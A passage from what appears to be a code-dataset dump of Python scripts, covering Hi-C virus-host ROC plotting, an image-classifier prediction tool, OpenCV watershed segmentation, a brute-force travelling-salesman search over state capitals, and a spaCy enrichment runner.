open(filename) as input:\n for i, line in enumerate(input):\n cut = line.strip().split(\"\\t\")\n if i == 0:\n continue\n threshold = float(cut[0])\n support = float(cut[-1])\n data[threshold] = support\n return data\n\n\ndef categorize_data_for_roc_analysis(host_data, min_value, max_value, increment):\n \"\"\"\n Go over and generate copy count threshold values and store the number of links kept at each cut off point\n Args:\n host_data (dict)\n min_value (float): lowest value to test as threshold\n max_value (float): highest value to test as threshold\n increment (float): multiplier to use for incrementing threshold\n Returns:\n roc_data (dict[float:list]): host hits remaining at each copy count threshold\n threshold_values (list[float]): copy count threshold generated\n\n \"\"\"\n print(\"Generating ROC categories\")\n roc_data = dict()\n threshold_values = list()\n threshold = min_value\n while threshold < max_value:\n roc_data[threshold] = [0, set()]\n threshold_values.append(threshold)\n threshold *= increment\n for mobile_contig, copy_counts in host_data.items():\n for copy_count in copy_counts:\n for threshold in threshold_values:\n if threshold > copy_count:\n break\n roc_data[threshold][0] += 1\n roc_data[threshold][1].add(mobile_contig)\n for threshold in threshold_values:\n roc_data[threshold][1] = len(roc_data[threshold][1])\n return roc_data, threshold_values\n\n\ndef generate_roc_curve_values(roc_data, threshold_values, min_value):\n \"\"\"\n Generate the x and y values of the copy count thresholding ROC curve\n Args:\n roc_data (dict[float:list]): host hits remaining at each copy count threshold\n threshold_values (list[float]): copy count threshold generated\n min_value (float): lowest value to test as threshold\n Returns:\n true_positives (list[float]): y-axis values of ROC curve\n false_positives: (list[float]): x-axis values of ROC curve\n\n \"\"\"\n print(\"Generating ROC curve\")\n true_positives = list()\n false_positives = list()\n max_possible_hits_accepted = roc_data[min_value][0]\n max_possible_mobile_contigs_with_hosts = roc_data[min_value][1]\n for threshold in threshold_values:\n hits_accepted = roc_data[threshold][0]\n false_positives.append(hits_accepted / max_possible_hits_accepted)\n mobile_contigs_with_hosts = roc_data[threshold][1]\n true_positives.append(mobile_contigs_with_hosts / max_possible_mobile_contigs_with_hosts)\n return true_positives, false_positives\n\n\ndef calculate_area_under_curve(false_positives, true_positives):\n \"\"\"\n Calculate the area under a ROC curve\n Args:\n false_positives (list): x-values of a ROC curve\n true_positives (list): y-values of a ROC curve\n Returns:\n auc (float): area under the curve\n\n \"\"\"\n print(\"Calculating AUC\")\n auc = 0\n for i, false_positive in enumerate(false_positives):\n if i + 1 == len(false_positives):\n break\n x_delta = false_positives[i] - false_positives[i + 1]\n height = (true_positives[i] + true_positives[i + 1]) / 2\n auc += x_delta * height\n print(f\"ROC area under curve = {auc}\")\n return auc\n\n\ndef get_optimal_threshold(threshold_values, true_positives, false_positives, min_fraction_without_hosts=0.8):\n \"\"\"\n Run down the ROC curve and stop when the optimal threshold has been reached\n Args:\n threshold_values (list[float]): copy count threshold generated\n true_positives (list[float]): y-axis values of ROC curve\n false_positives: (list[float]): x-axis values of ROC curve\n min_fraction_without_hosts (float): lowest acceptable fraction of mobile elements still with a host\n Returns:\n optimal_threshold (float): the optimal copy count value\n fp_rate (float): the x-value on the ROC curve of the optimal cut-off\n tp_rate (float): the y-value on the ROC curve of the optimal cut-off\n\n \"\"\"\n print(\"Calculating optimal threshold\")\n optimal_threshold = 0\n fp_rate = 0\n tp_rate = 0\n for i, threshold in enumerate(threshold_values):\n optimal_threshold = threshold\n fp_rate = false_positives[i]\n tp_rate = true_positives[i]\n if fp_rate + tp_rate < 1 or tp_rate < min_fraction_without_hosts:\n break\n print(f\"Optimal value = {optimal_threshold}\")\n return optimal_threshold, fp_rate, tp_rate\n\n\ndef plot_roc_curve(ax, true_positives, false_positives, fp_rate=1, tp_rate=1, optimal_threshold=None, auc=None):\n print(f\"Drawing ROC curve\")\n ax.plot(false_positives, true_positives, c=\"k\", alpha=0.3)\n ax.scatter(false_positives, true_positives, c=\"k\", alpha=0.6)\n ax.scatter([fp_rate], [tp_rate], c=\"r\")\n ax.plot([0, 1], [1, 0], \"--\", c=\"r\", alpha=0.5)\n ax.set_xlim(-0.01, 1.01)\n ax.set_ylim(-0.01, 1.01)\n ax.set_xlabel(\"Fraction of all hits kept\")\n ax.set_ylabel(\"Fraction of viruses with one host\")\n if auc is not None:\n auc = round(auc, 2)\n optimal_threshold = round(optimal_threshold, 2)\n ax.text(0.25, 0.78, f\"Chosen threshold\\n(0.14 copies per cell)\", c=\"r\")\n ax.grid(axis=\"both\", ls=\"--\", alpha=0.1, c=\"k\", which=\"major\")\n\n\ndef plot_host_validation(ax, prophage_validation, color=\"k\", label=None):\n xs = list()\n ys = list()\n chosen_validation = 0\n for x, y in prophage_validation.items():\n xs.append(x)\n ys.append(y)\n if x == 0.14:\n chosen_validation = y\n ys = [x for y, x in sorted(zip(xs, ys), reverse=True)]\n xs.sort(reverse=True)\n ax.plot(xs, ys, c=color, alpha=0.3)\n ax.axvline(0.14, linestyle=\"--\", c=\"r\", alpha=0.4)\n ax.scatter(xs, ys, c=color, alpha=0.6, label=label)\n ax.scatter([0.14], [chosen_validation], c=\"r\")\n\n ax.set_xlim(-0.01, 1.01)\n ax.set_ylim(-1, 101)\n ax.set_xlabel(\"Minimum copy count threshold\")\n ax.set_ylabel(\"Percent validated prophage hosts\")\n ax.text(0.17, 70, f\"Chosen threshold\\n(0.14 copies per cell)\", c=\"r\")\n ax.grid(axis=\"both\", ls=\"--\", alpha=0.1, c=\"k\", which=\"major\")\n\n\n\ndef load_rarefaction_data(directory):\n master_data = dict()\n for filename in os.listdir(directory):\n path = os.path.join(directory, filename)\n read_ct = int(filename.split(\".\")[0].split(\"_\")[-1])\n data = load_host_links_all(path)\n master_data[read_ct] = data\n return master_data\n\n\ndef load_host_links_all(filename):\n print(f\"Loading data from {filename}\")\n data = dict()\n with open(filename) as input:\n for i, line in enumerate(input):\n cut = line.strip().split(\"\\t\")\n if i == 0:\n if cut[0] != \"mobile_contig_name\" or \\\n cut[5] != \"cluster_name\" or \\\n cut[14] != \"mobile_element_copies_per_cell\":\n raise ImportError(\"not a good master table\")\n continue\n virus = cut[0]\n viral_depth = float(cut[3])\n bacteria = cut[5]\n intra_links = float(cut[9])\n inter_links = float(cut[11])\n if inter_links < 5 or intra_links < 10:\n continue\n links = int(cut[11])\n host_depth = float(cut[8])\n norm_links = (links / host_depth) / viral_depth\n copy_count = float(cut[14])\n adjusted_inter_vs_intra_ratio = float(cut[16])\n if virus not in data:\n data[virus] = dict()\n data[virus][bacteria] = (links, norm_links, copy_count, adjusted_inter_vs_intra_ratio)\n return data\n\n\ndef get_contig_host_pool(master_data, min_count=4, max_to_plot=10):\n contig_host_pool = dict()\n for data in master_data.values():\n for virus, subdata in data.items():\n for host in subdata:\n contig_host = f\"{virus}:{host}\"\n if contig_host not in contig_host_pool:\n contig_host_pool[contig_host] = 0\n contig_host_pool[contig_host] += 1\n filtered_contig_host_pool = set()\n for contig_host, count in contig_host_pool.items():\n if len(filtered_contig_host_pool) > max_to_plot:\n break\n if count >= min_count:\n filtered_contig_host_pool.add(contig_host)\n print(f\"Kept {len(filtered_contig_host_pool)} out of {len(contig_host_pool)} virus:host links for plotting\")\n return filtered_contig_host_pool\n\n\ndef plot_data(contig_host_pool, master_data, n, ax):\n print(f\"plotting value {n}\")\n for i, contig_host in enumerate(contig_host_pool):\n if i % 1000 == 0 and i > 0:\n print(f\"processed {i} links\")\n virus = contig_host.split(\":\")[0]\n host = contig_host.split(\":\")[1]\n xs = list()\n ys = list()\n for read_ct, data in master_data.items():\n if virus not in data:\n continue\n if host not in data[virus]:\n continue\n value = data[virus][host][n]\n xs.append(read_ct)\n ys.append(value)\n ys = [x for y, x in sorted(zip(xs, ys), reverse=True)]\n xs.sort(reverse=True)\n ax.plot(xs, ys, \"-\", c=\"k\", alpha=0.03)\n # ax.plot(xs, ys, \"o\", c=\"k\", alpha=0.05, markersize=1)\n\n\ndef make_histogram_table(contig_host_pool, master_data, n):\n print(f\"making histogram data for value {n}\")\n bins = 50\n st = 0\n fi = 2\n bin_size = (fi - st) / bins\n\n xs = list()\n ys = list()\n x = st\n while x <= fi:\n read_ct = max(master_data.keys())\n data = master_data[read_ct]\n count = 0\n for i, contig_host in enumerate(contig_host_pool):\n if i % 1000 == 0 and i > 0:\n print(f\"processed {i} links\")\n virus = contig_host.split(\":\")[0]\n host = contig_host.split(\":\")[1]\n value = data[virus][host][n]\n if x <= value < x + bin_size:\n count += 1\n xs.append(x)\n ys.append(count)\n x += bin_size\n for i, x in enumerate(xs):\n y = ys[i]\n print(x, y, sep=\"\\t\")\n\n\ndef main():\n master_data = load_rarefaction_data(\"rarefaction_data\")\n contig_host_pool = get_contig_host_pool(master_data, min_count=1, max_to_plot=10000)\n\n host_data = load_host_links(\"unfiltered_master_table.tsv\")\n all_prophage_validation = load_validation(\"validation_values_all_prophages.tsv\")\n single_host_prophage_validation = load_validation(\"validation_values_singlehost_prophages.tsv\")\n\n min_value = 0.0001\n roc_data, threshold_values = categorize_data_for_roc_analysis(host_data, min_value, 1000, 1.1)\n true_positives, false_positives = generate_roc_curve_values(roc_data, threshold_values, min_value)\n auc = calculate_area_under_curve(false_positives, true_positives)\n optimal_threshold, fp_rate, tp_rate = get_optimal_threshold(threshold_values, true_positives, false_positives)\n\n print(\"plotting subplots\")\n fig = plt.figure(figsize=(15, 5.4))\n initialize_plot_style()\n gs = gridspec.GridSpec(nrows=2, ncols=3, figure=fig)\n ax1 = fig.add_subplot(gs[0, 0])\n plt.gca().invert_xaxis()\n ax2 = fig.add_subplot(gs[1, 0])\n plt.gca().invert_xaxis()\n ax3 = fig.add_subplot(gs[:, 1])\n ax4 = fig.add_subplot(gs[:, 2])\n\n #########################\n for i, ax in enumerate([ax1, ax2]):\n ax.set_xscale(\"log\")\n plot_data(contig_host_pool, master_data, i + 2, ax)\n ax.set_xlim(105000000, 95000)\n ax.grid(axis=\"both\", ls=\"--\", alpha=0.1, c=\"k\", which=\"major\")\n ax.set_ylim(-0.05, 3.05)\n ax2.set_xlabel(\"Hi-C library size (read count)\")\n ax1.set_ylabel(\"Copies per cell\")\n ax2.set_ylabel(\"Connectivity ratio (R')\")\n\n #########################\n plot_roc_curve(ax3, true_positives, false_positives, fp_rate=fp_rate, tp_rate=tp_rate,\n optimal_threshold=optimal_threshold, auc=auc)\n plot_host_validation(ax4, all_prophage_validation, label=\"All prophages\")\n plot_host_validation(ax4, single_host_prophage_validation, color=\"b\", label=\"Single-host prophages\")\n\n ax1.set_title(\"A\", fontsize=20, x=-0.1)\n ax2.set_title(\"B\", fontsize=20, x=-0.1, y=1.05)\n ax3.set_title(\"C\", fontsize=20, x=-0.1)\n ax4.set_title(\"D\", fontsize=20, x=-0.1)\n plt.tight_layout()\n plt.savefig(\"figure.png\", dpi=300)\n\n\nmain()\n", "sub_path": "figures/figure_roc_curve/draw.py", "file_name": "draw.py", "file_ext": "py", "file_size_in_byte": 14349, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "matplotlib.style.use", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.style", "line_number": 34, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 35, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 36, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 37, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rc", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rc", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 232, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 233, "usage_type": "call"}, {"api_name": "os.path", "line_number": 233, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 357, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 357, "usage_type": "name"}, {"api_name": "matplotlib.gridspec.GridSpec", "line_number": 359, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 359, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 361, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 361, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 363, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 363, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 388, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 388, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 389, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 389, "usage_type": "name"}]} {"seq_id": "19398679", "text": "# predict.py\n#\n# Command line tool to predict the class of an image using a pretrained\n# pytorch network\n#\n# Author: Taylor Weiss\n# Class: Udacity - AI Programming with Python Nanodegree Program\n# Project: Image Classifier\n\n\nimport argparse\nimport data\nimport network\nimport json\nimport os.path\n\n\n# Define command line arguments\nparser = argparse.ArgumentParser(\n description='use a checkpoint to predict the name of an image'\n)\n\nparser.add_argument(\n 'input',\n action='store',\n help='path to the image file'\n)\nparser.add_argument(\n 'checkpoint',\n action='store',\n help='path to the checkpoint file'\n)\nparser.add_argument(\n '--top_k',\n action='store',\n help='number of likely classes to return',\n type=int,\n default=5\n)\nparser.add_argument(\n '--category_names',\n action='store',\n help='path to a json mapping of category labels to names'\n)\nparser.add_argument(\n '--gpu',\n action='store_true',\n help='use the gpu for prediction',\n default=False\n)\n\nargs = parser.parse_args()\n\n# validate and convert the image file\nimage_filename = args.input\nif not os.path.isfile(image_filename):\n print('Unable to find image file', image_filename)\n exit()\n\n# BUGBUG: useful for testing, but probably don't want to assume the\n# image is from the image dataset\nimage_category = image_filename.split(os.sep)[-2]\n\nimage_data = data.process_image(args.input)\n\n# create the network\ndevice = 'cuda' if args.gpu else 'cpu'\nmodel = network.load_network(args.checkpoint, device)\n\n# predict\nprobs, classes = network.predict(image_data, model, device, topk=args.top_k)\n\n# Load the category to name mapping if provided\ncat_to_name = None\nif args.category_names and os.path.isfile(args.category_names):\n with open(args.category_names, 'r') as f:\n cat_to_name = json.load(f)\n\n# output results\nprint('Image category:', image_category)\nif cat_to_name:\n print('Image name:', cat_to_name[image_category])\nprint('Probabilities:', probs)\nprint('Classes:', classes)\nif cat_to_name:\n names = [cat_to_name[cat] for cat in classes]\n print('Names:', names)\n", "sub_path": "predict.py", "file_name": "predict.py", "file_ext": "py", "file_size_in_byte": 2097, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 56, "usage_type": "name"}, {"api_name": "os.path.sep", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 62, "usage_type": "name"}, {"api_name": "data.process_image", "line_number": 64, "usage_type": "call"}, {"api_name": "network.load_network", "line_number": 68, "usage_type": "call"}, {"api_name": "network.predict", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 75, "usage_type": "name"}, {"api_name": "json.load", "line_number": 77, "usage_type": "call"}]} {"seq_id": "514414843", "text": "import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\n\nimg = cv2.imread('coins.jpg')\nimg = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\nret, thresh = cv2.threshold(gray,0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n\n# noise removal\nkernel = np.ones((3,3),np.uint8)\nopening = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel, iterations = 2)\n\n# sure background area\nsure_bg = cv2.dilate(opening,kernel,iterations=3)\n\n# Finding sure foreground area\ndist_transform = cv2.distanceTransform(opening,cv2.DIST_L2,5)\nret, sure_fg = cv2.threshold(dist_transform,0.2*dist_transform.max(),255,0)\n\n# Finding unknown region\nsure_fg = np.uint8(sure_fg)\nunknown = cv2.subtract(sure_bg,sure_fg)\n\n# Marker labelling\nret, markers = cv2.connectedComponents(sure_fg)\n\n# Add one to all labels so that sure background is not 0, but 1\nmarkers = markers+1\n\n# Now, mark the region of unknown with zero\nmarkers[unknown==255] = 0\n\n# Apply watershed\nmarkers = cv2.watershed(img,markers)\nresult = np.copy(img)\nresult[markers == -1] = [255,0,0]\n\nplt.subplot(2,3,1),plt.imshow(img)\nplt.title('Original'), plt.xticks([]), plt.yticks([])\nplt.subplot(2,3,2),plt.imshow(gray)\nplt.title('Greyscale'), plt.xticks([]), plt.yticks([])\nplt.subplot(2,3,3),plt.imshow(dist_transform)\nplt.title('Distance Transform'), plt.xticks([]), plt.yticks([])\nplt.subplot(2,3,4),plt.imshow(unknown)\nplt.title('Sure fg/bg regions marked purple'), plt.xticks([]), plt.yticks([])\nplt.subplot(2,3,5),plt.imshow(markers)\nplt.title('Marker Image after Segmentation'), plt.xticks([]), plt.yticks([])\nplt.subplot(2,3,6),plt.imshow(result)\nplt.title('Result'), plt.xticks([]), plt.yticks([])\n\nplt.show()\n", "sub_path": "watershed_segmentation.py", "file_name": "watershed_segmentation.py", "file_ext": "py", "file_size_in_byte": 1685, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "cv2.imread", "line_number": 5, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 6, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 7, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY_INV", "line_number": 8, "usage_type": "attribute"}, {"api_name": "cv2.THRESH_OTSU", "line_number": 8, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 11, "usage_type": "attribute"}, {"api_name": "cv2.morphologyEx", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.MORPH_OPEN", "line_number": 12, "usage_type": "attribute"}, {"api_name": "cv2.dilate", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.distanceTransform", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.DIST_L2", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.subtract", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.connectedComponents", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.watershed", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}]} {"seq_id": "131886312", "text": "import numpy as np\nimport pandas as pd\n#from matplotlib import pyplot as plt\n#from mpl_toolkits.basemap import Basemap\nimport itertools as it\nimport random\n\nnames = ['State', 'City', 'Latitude', 'Longitude']\nData = pd.read_table('posit.txt', names=names)\n\ncity_to_index = {}\nfor i in xrange(50):\n city_to_index[Data['City'][i]] = i\n\nindex_to_city = {}\nfor key in city_to_index:\n index_to_city[city_to_index[key]] = key\n\ndef distance(city1, city2):\n lat1 = Data['Latitude'][city_to_index[city1]]*np.pi/180.\n lat2 = Data['Latitude'][city_to_index[city2]]*np.pi/180.\n lon1 = Data['Longitude'][city_to_index[city1]]*np.pi/180.\n lon2 = Data['Longitude'][city_to_index[city2]]*np.pi/180.\n dlon = np.abs(lon2 - lon1)\n dlat = np.abs(lat2 - lat1)\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = np.sin(dlat/2)**2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon/2)**2\n c = 2 * np.arcsin(min(1,np.sqrt(a)))\n return c * 6373 # km this value includes some elipticity of the earth\n # and is optimizes for ~39 lat Haversine Formula\n\ndef trip_length(list_of_cities):\n length = 0\n for i in range(len(list_of_cities)-1):\n city1 = list_of_cities[i]\n city2 = list_of_cities[i+1]\n length += distance(city1, city2)\n return length\n\ndef brute_force(start_city, other_cities):\n trips = []\n for perm in list(it.permutations(other_cities)):\n trips.append([start_city]+[x for x in perm]+[start_city])\n for trip in trips:\n trips.remove(trip[::-1])\n distances = np.zeros(len(trips))\n for i in xrange(len(distances)):\n distances[i] = trip_length(trips[i])\n index = np.argsort(distances)\n ordered_distance = distances[index]\n ordered_trips = []\n for value in index:\n ordered_trips.append(trips[value])\n return ordered_distance, ordered_trips\n\ncapitals = list(Data['City'].drop([city_to_index['Juneau'],\n city_to_index['Honolulu']]).values)\nrandom_11 = []\nfor i in range(11):\n random_11.append(random.choice(capitals))\n capitals.remove(random_11[-1])\n\nordered_distance, ordered_trips = brute_force(random_11[0],\n random_11[1:])\n# why do you have to assign this\n\nnp.savez('11_city_brute_force.npz', ordered_distance=ordered_distance,\n ordered_trips=ordered_trips)\n", "sub_path": "traveling_sales.py", "file_name": "traveling_sales.py", "file_ext": "py", "file_size_in_byte": 2365, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "pandas.read_table", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 21, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 23, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.arcsin", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 29, "usage_type": "call"}, {"api_name": "itertools.permutations", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 50, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.savez", "line_number": 68, "usage_type": "call"}]} {"seq_id": "597123587", "text": "# -*- coding: utf-8 -*-\n\n\"\"\"\n\nThe following script performs the necessary NLP enrichment on the documents.\n\nExamples\n--------\n\n.. code-block:: bash\n\n python document_enrichment --cores 2 --fields title abstract --inputs \\\nsample_dataset/patent.sample* --output .\n\n\"\"\"\n\nimport os\nimport argparse\nimport multiprocessing as mp\n\nfrom spacy_enrichment.spacy_enrichment import enrich_documents\n\n\ndef run_enricher(args):\n \"\"\"\n\n Perform enrichment on multiple document files in parallel.\n\n Parameters\n ----------\n args : dict\n Arguments.\n\n \"\"\"\n\n if args.cores == 1:\n for ipath in args.inputs:\n enrich_documents(ipath, args)\n else:\n pool = mp.Pool(args.cores)\n for ipath in args.inputs:\n res = pool.apply_async(enrich_documents, args=(ipath, args, ))\n pool.close()\n pool.join()\n if not res.successful():\n print(res.get())\n\n\ndef files_path_validation(paths):\n \"\"\" Validation of a list of file paths.\n\n Parameters\n ----------\n paths : list\n A list of paths to files.\n\n Raises\n ------\n FileNotFoundError\n Raised if ``path`` doesn't exist.\n\n \"\"\"\n\n for path in paths:\n if not os.path.exists(path):\n raise FileNotFoundError('File {0} is not there.'.format(path))\n\n\ndef dir_path_validation(path, create_dir=False):\n \"\"\"Directory path validation.\n\n Parameters\n ----------\n path : str\n /path/to/a/directory/.\n create_dir : bool\n If True, a new directory will be made once it doesn't exist.\n\n Raises\n ------\n FileNotFoundError\n Raised if ``path`` doesn't exist.\n NotADirectoryError\n Raised if ``path`` is not a directory.\n\n \"\"\"\n\n if not os.path.exists(path):\n if create_dir:\n os.makedirs(path)\n else:\n raise FileNotFoundError('Directory {0} is not there.'.format(path))\n elif not os.path.isdir(path):\n raise NotADirectoryError('{0} is not a directory.'.format(path))\n\n\nif __name__ == \"__main__\":\n pparser = argparse.ArgumentParser()\n pparser.add_argument('--fields', nargs='+', type=str,\n help='Content fields to enrich.')\n pparser.add_argument('--cores', type=int, default=2,\n help='How many cores to use?')\n pparser.add_argument('--noun-chunk', action='store_true',\n help='generate noun chunks')\n pparser.add_argument('--sents', action='store_true',\n help='split to sentences')\n pparser.add_argument('--svo', action='store_true',\n help='generate svo')\n pparser.add_argument('--entity', action='store_true',\n help='generate entities')\n pparser.add_argument('--inputs', nargs='+', required=True,\n help='Path to input documents')\n pparser.add_argument('--output', required=True, help='Path to output dir.')\n pparser.add_argument('--chunk-size', type=int, default=128,\n help='# of documents to handle at once')\n args = pparser.parse_args()\n files_path_validation(args.inputs)\n dir_path_validation(args.output, create_dir=True)\n run_enricher(args)\n", "sub_path": "document_enrichment.py", "file_name": "document_enrichment.py", "file_ext": "py", "file_size_in_byte": 3234, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "spacy_enrichment.spacy_enrichment.enrich_documents", "line_number": 38, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 40, "usage_type": "call"}, {"api_name": "spacy_enrichment.spacy_enrichment.enrich_documents", "line_number": 42, "usage_type": "argument"}, {"api_name": "os.path.exists", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 93, "usage_type": "call"}, {"api_name": 